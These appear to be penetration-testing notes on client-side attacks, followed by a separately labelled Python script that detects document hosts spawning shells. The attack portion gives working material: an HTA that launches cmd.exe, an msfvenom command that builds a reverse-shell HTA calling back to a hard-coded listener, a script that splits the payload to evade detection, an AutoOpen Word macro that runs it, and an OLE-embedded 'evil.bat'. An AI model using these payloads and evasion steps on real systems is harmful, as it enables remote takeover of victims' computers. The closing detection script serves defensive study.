Client Side Attacks
Enumeration
Passive Enumeration:
Identify the victim's browser.
Active Enumeration:
Social Engineering:
Craft messages or scenarios to manipulate users into revealing sensitive information or performing actions.
Leveraging HTML Apps
Tool: fingerprintjs2
A JavaScript library to uniquely identify a browser based on its features.
HTA Attack:
Create an HTA (HTML Application) to execute malicious scripts.
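Example HTA file (file.hta):
<!DOCTYPE html>
<html>
<head>
<script>
  // Launch cmd.exe through the WScript.Shell COM object
  var x = 'cmd.exe';
  new ActiveXObject('WScript.shell').Run(x);
</script>
</head>
<body>
<script>
  // Close the HTA window once the command has been started
  self.close();
</script>
</body>
</html>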
Copy the HTA file to a web server:
sudo cp file.hta /var/www/html/file2.hta
Generate an HTA payload with msfvenom:
sudo msfvenom -p windows/shell_reverse_tcp LHOST=192.168.114.134 LPORT=4444 -f hta-psh -o /var/www/html/evil.hta
Exploiting Microsoft Office
Word Macro:
Split the payload to evade detection.
payload = ""  # payload from msfvenom
n = 50        # characters per chunk
# Print one VBA concatenation line per 50-character chunk
for i in range(0, len(payload), n):
    print('Str = Str + "' + payload[i:i+n] + '"')
Add the split payload to a Word Macro (document.docm).
Sub AutoOpen()
    test1
End Sub

Sub Doc_Open()
    test1
End Sub

Sub test1()
    Dim Str As String
    ' Add the split payload here
    CreateObject("Wscript.shell").Run Str
End Sub
Object Linking and Embedding (OLE):
Create an evil batch file (evil.bat).
Create a link object in the Word document (document.docm).
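From the detection side, the HTA, macro and OLE techniques above all end with mshta.exe or winword.exe starting a command interpreter. The following is an added example, not part of the original page, that flags that parent/child pattern in process-creation events; the events are constructed, the field names assume Sysmon Event ID 1, and web.example is a placeholder host.

```python
import ntpath
import re

# Hosts that render untrusted documents and should rarely spawn shells.
DOCUMENT_HOSTS = {"mshta.exe", "winword.exe"}
# Interpreters the HTA and macro examples start via WScript.Shell.Run.
SHELLS = {"cmd.exe", "powershell.exe", "wscript.exe", "cscript.exe"}
REMOTE_HTA = re.compile(r"https?://\S+\.hta\b", re.IGNORECASE)

def base(path):
    """Lower-cased file name of a Windows path."""
    return ntpath.basename(path).lower()

def classify(event):
    """Return the list of findings for one process-creation event."""
    findings = []
    parent, child = base(event["ParentImage"]), base(event["Image"])
    if parent in DOCUMENT_HOSTS and child in SHELLS:
        findings.append(f"{parent} spawned {child}")
    if child == "mshta.exe" and REMOTE_HTA.search(event["CommandLine"]):
        findings.append("mshta.exe loaded a remote .hta")
    return findings

# Constructed sample events (assumed Sysmon Event ID 1 field names).
SAMPLE_EVENTS = [
    {"ParentImage": r"C:\Windows\explorer.exe",
     "Image": r"C:\Windows\System32\cmd.exe",
     "CommandLine": "cmd.exe"},
    {"ParentImage": r"C:\Program Files\Internet Explorer\iexplore.exe",
     "Image": r"C:\Windows\System32\mshta.exe",
     "CommandLine": r'"C:\Windows\System32\mshta.exe" http://web.example/file2.hta'},
    {"ParentImage": r"C:\Windows\System32\mshta.exe",
     "Image": r"C:\Windows\System32\cmd.exe",
     "CommandLine": "cmd.exe"},
    {"ParentImage": r"C:\Program Files\Microsoft Office\root\Office16\WINWORD.EXE",
     "Image": r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe",
     "CommandLine": "powershell.exe"},
]

def triage(events):
    """Map event index -> findings, skipping events with none."""
    return {i: f for i, e in enumerate(events) if (f := classify(e))}

if __name__ == "__main__":
    for idx, hits in triage(SAMPLE_EVENTS).items():
        print(idx, hits)
```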